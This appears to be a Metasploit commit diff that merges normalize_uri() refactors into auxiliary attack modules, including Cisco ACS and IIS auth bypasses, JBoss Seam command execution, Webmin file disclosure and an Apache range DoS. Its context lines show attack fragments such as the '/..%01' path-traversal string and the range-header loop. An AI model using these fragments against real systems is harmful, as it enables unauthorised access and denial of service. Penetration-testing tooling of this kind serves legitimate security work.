Merges and resolves CJR's normalize_uri fixes

Merge remote-tracking branch 'ChrisJohnRiley/set_normalize_uri_on_modules'
into set_normalize_uri_on_modules

Note that this trips all kinds of msftidy warnings, but that's for another
day.

Conflicts:
	modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb
	modules/exploits/windows/http/xampp_webdav_upload_php.rb

Author: todb

modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb

@@ -74,8 +74,9 @@ def run_host(ip)
 		print_status("Issuing password change request for: " + datastore['USERNAME'])
 
 		begin
+			uri = normalize_uri(target_uri.path)
 			res = send_request_cgi({
-				'uri'     => target_uri.path,
+				'uri'     => uri,
 				'method'  => 'POST',
 				'data'    => data,
 				'headers' =>

modules/auxiliary/admin/http/contentkeeper_fileaccess.rb

@@ -43,7 +43,7 @@ def run_host(ip)
 			res = send_request_raw(
 				{
 					'method'  => 'POST',
-					'uri'     => datastore['URL'] + '?-o+' + '/home/httpd/html/' + tmpfile + '+' + datastore['FILE'],
+					'uri'     => normalize_uri(datastore['URL']) + '?-o+' + '/home/httpd/html/' + tmpfile + '+' + datastore['FILE'],
 				}, 25)
 
 			if (res and res.code == 500)

modules/auxiliary/admin/http/iis_auth_bypass.rb

@@ -43,7 +43,7 @@ def initialize(info = {})
 
 
 	def has_auth
-		uri = target_uri.path
+		uri = normalize_uri(target_uri.path)
 		uri << '/' if uri[-1, 1] != '/'
 
 		res = send_request_cgi({
@@ -56,7 +56,7 @@ def has_auth
 	end
 
 	def try_auth
-		uri = target_uri.path
+		uri = normalize_uri(target_uri.path)
 		uri << '/' if uri[-1, 1] != '/'
 		uri << Rex::Text.rand_text_alpha(rand(10)+5) + ".#{Rex::Text.rand_text_alpha(3)}"
 

modules/auxiliary/admin/http/intersil_pass_reset.rb

@@ -73,7 +73,7 @@ def run
 		@peer = "#{rhost}:#{rport}"
 		return if check != Exploit::CheckCode::Vulnerable
 
-		uri = target_uri.path
+		uri = normalize_uri(target_uri.path)
 		uri << '/' if uri[-1,1] != '/'
 
 		res = send_request_cgi({

modules/auxiliary/admin/http/jboss_seam_exec.rb

@@ -42,7 +42,7 @@ def initialize(info = {})
 	end
 
 	def run
-		jbr = datastore['JBOSS_ROOT']
+		jbr = normalize_uri(datastore['JBOSS_ROOT'])
 		cmd_enc = ""
 		cmd_enc << Rex::Text.uri_encode(datastore["CMD"])
 

modules/auxiliary/admin/http/scrutinizer_add_user.rb

@@ -45,9 +45,10 @@ def initialize(info = {})
 	end
 
 	def run
+		uri = normalize_uri(target_uri.path)
 		res = send_request_cgi({
 			'method'    => 'POST',
-			'uri'       => target_uri.path,
+			'uri'       => uri,
 			'vars_post' => {
 				'tool'              => 'userprefs',
 				'newUser'           => datastore['USERNAME'],

modules/auxiliary/admin/http/typo3_sa_2009_001.rb

@@ -63,6 +63,7 @@ def run
 	# Null byte fixed in PHP 5.3.4
 	#
 
+    uri = normalize_uri(datastore['URI'])
 	case datastore['RFILE']
 	when nil
 		# Nothing
@@ -95,8 +96,7 @@ def run
 		juhash = Digest::MD5.hexdigest(juarray)
 		juhash = juhash[0..9] # shortMD5 value for use as juhash
 
-		file_uri = "#{datastore['URI']}/index.php?jumpurl=#{jumpurl}&juSecure=1&locationData=#{locationData}&juHash=#{juhash}"
-		file_uri = file_uri.sub("//", "/") # Prevent double // from appearing in uri
+		file_uri = "#{uri}/index.php?jumpurl=#{jumpurl}&juSecure=1&locationData=#{locationData}&juHash=#{juhash}"
 		vprint_status("Checking Encryption Key [#{i}/1000]: #{final}")
 
 		begin

modules/auxiliary/admin/tikiwiki/tikidblib.rb

@@ -47,7 +47,8 @@ def initialize(info = {})
 	def run
 		print_status("Establishing a connection to the target...")
 
-		rpath = datastore['URI'] + "/tiki-lastchanges.php?days=1&offset=0&sort_mode="
+		uri = normalize_uri(datastore['URI'])
+		rpath = uri + "/tiki-lastchanges.php?days=1&offset=0&sort_mode="
 
 		res = send_request_raw({
 			'uri'     => rpath,

modules/auxiliary/admin/webmin/file_disclosure.rb

@@ -65,7 +65,8 @@ def initialize(info = {})
 	def run
 		print_status("Attempting to retrieve #{datastore['RPATH']}...")
 
-		uri = Rex::Text.uri_encode(datastore['DIR']) + "/..%01" * 40 + Rex::Text.uri_encode(datastore['RPATH'])
+		dir = normalize_uri(datastore['DIR'])
+		uri = Rex::Text.uri_encode(dir) + "/..%01" * 40 + Rex::Text.uri_encode(datastore['RPATH'])
 
 		res = send_request_raw({
 			'uri'            => uri,

modules/auxiliary/dos/http/apache_range_dos.rb

@@ -45,7 +45,7 @@ def initialize(info = {})
 	end
 
 	def run
-		uri = datastore['URI']
+		uri = normalize_uri(datastore['URI'])
 		ranges = ''
 		for i in (0..1299) do
 			ranges += ",5-" + i.to_s